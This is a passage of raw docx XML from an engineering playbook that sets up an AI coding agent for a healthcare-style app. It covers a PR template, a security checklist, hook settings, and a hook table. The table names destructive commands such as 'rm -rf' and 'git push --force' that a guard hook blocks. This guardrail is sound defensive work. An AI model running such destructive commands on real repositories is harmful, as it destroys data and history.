      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Schema/Infra: {migrations, Terraform, AppConfig keys}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Tests: {N new unit tests, M new integration tests}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Why</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{Aurion-specific reason. Backlog ID + CLAUDE.md section.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Test plan</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] cd backend &amp;&amp; python3 -m pytest -q → {N passed}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] xcodebuild ... iPhone 17 build → BUILD SUCCEEDED</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] xcodebuild ... iPad Pro 11-inch (M4) build → BUILD SUCCEEDED</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] docker compose up &amp;&amp; curl localhost:8080/health → 200</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] {Each AC, exact command, observed result}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Security checklist</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Descriptive mode: AI prompts enforce describe-don't-interpret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] No PHI in logs/errors/responses</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] AI calls via provider registry (no direct OpenAI/Anthropic/Gemini)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Masking proof preserved on every frame upload (P0-02)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Audit log append-only — no UPDATE/DELETE on audit rows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Secrets via Secrets Manager — no API keys in env at runtime</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Consent gate intact (consent_confirmed required)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] iOS Keychain only for voice embedding</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Stage 1 &lt; 30s / Stage 2 &lt; 5min SLA within budget</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- [ ] Fail-closed masking (P0-01) — no raw-byte fallback</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Out of scope</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{Verbatim from the plan.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Deferred concerns</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{P2/P3 simplify findings not fixed here. Link follow-up tickets.}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Backlog</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Closes Linear AUR-{ticket}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Backlog item: {P0-04 / M-09 / etc.}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="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Honesty rule:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Security checkboxes are not decorative. /verify-acceptance runs greps against the diff and ticks the boxes it can prove. Boxes it cannot auto-prove get left unticked. /auto-merge is BLOCKED for any PR with unticked security checkboxes until you tick them manually. Belt and suspenders on top of the CI gate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>10. Hooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/settings.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (team-shared, NOT settings.local.json):</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "hooks": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "PostToolUse": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "matcher": "Write|Edit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "hooks": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          {"type": "command", "command": ".claude/hooks/phi-scan.sh ${file_path}", "blocking": true},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          {"type": "command", "command": ".claude/hooks/auto-lint.sh ${file_path}", "blocking": false}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "PreToolUse": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "matcher": "Bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "hooks": [{"type": "command", "command": ".claude/hooks/guard-destructive.sh", "blocking": true}]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>phi-scan.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Greps the changed file for known PHI patterns in logging, exception messages, API responses. Blocks the write if found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>auto-lint.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ruff check --fix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for Python, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>swift-format</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> for Swift. Non-blocking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>unit-tests-on-write.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Runs the matching test file if one exists. Non-blocking so the driver sees the failure without deadlock.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>guard-destructive.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Blocks </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>rm -rf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>git push --force</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
